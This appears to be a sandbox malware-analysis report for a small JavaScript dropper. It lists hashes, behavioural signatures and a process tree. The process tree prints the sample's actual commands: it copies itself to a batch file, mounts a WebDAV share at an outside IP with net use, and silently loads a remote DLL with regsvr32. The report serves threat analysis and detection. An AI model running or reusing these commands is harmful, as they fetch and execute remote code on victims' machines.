Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 15:43 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2419917728311676320.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2419917728311676320.js
Resource
win10v2004-20240709-en
General
-
Target
2419917728311676320.js
-
Size
5KB
-
MD5
803773aeb4ffb459d09abdb44d050c75
-
SHA1
1ae0d3388bcf5f507c474da66e28398bd1b3ae73
-
SHA256
f4dc317e00002ec2675c347bdf4f48c67971484b30b1b13dfa08ac1a594d0556
-
SHA512
7ade6c959004fff0f4969106c5d7c09f181e2ddded2ad7fcc69226f9491913838990ec32606fab7bc72ea44cb6ed7eac2ba4610c3bf9435f423d4d80515303c9
-
SSDEEP
96:lL87fjdy4ykX5Gz/YB1lBSciTf5meO0iRZeSkye5:W7fJy4TX5q/YB1lBSciTf5m/0iRZDkyG
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3180 wrote to memory of 3700 3180 wscript.exe 83 PID 3180 wrote to memory of 3700 3180 wscript.exe 83 PID 3700 wrote to memory of 3604 3700 cmd.exe 86 PID 3700 wrote to memory of 3604 3700 cmd.exe 86 PID 3700 wrote to memory of 2444 3700 cmd.exe 87 PID 3700 wrote to memory of 2444 3700 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2419917728311676320.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2419917728311676320.js" "C:\Users\Admin\\eugmlm.bat" && "C:\Users\Admin\\eugmlm.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3604
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\229.dll3⤵PID:2444
-
-
Network
-
Remote address:8.8.8.8:53Request75.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.135.221.88.in-addr.arpaIN PTRResponse232.135.221.88.in-addr.arpaIN PTRa88-221-135-232deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request63.141.182.52.in-addr.arpaIN PTRResponse
-
72 B 158 B 1 1
DNS Request
75.159.190.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
232.135.221.88.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
63.141.182.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5803773aeb4ffb459d09abdb44d050c75
SHA11ae0d3388bcf5f507c474da66e28398bd1b3ae73
SHA256f4dc317e00002ec2675c347bdf4f48c67971484b30b1b13dfa08ac1a594d0556
SHA5127ade6c959004fff0f4969106c5d7c09f181e2ddded2ad7fcc69226f9491913838990ec32606fab7bc72ea44cb6ed7eac2ba4610c3bf9435f423d4d80515303c9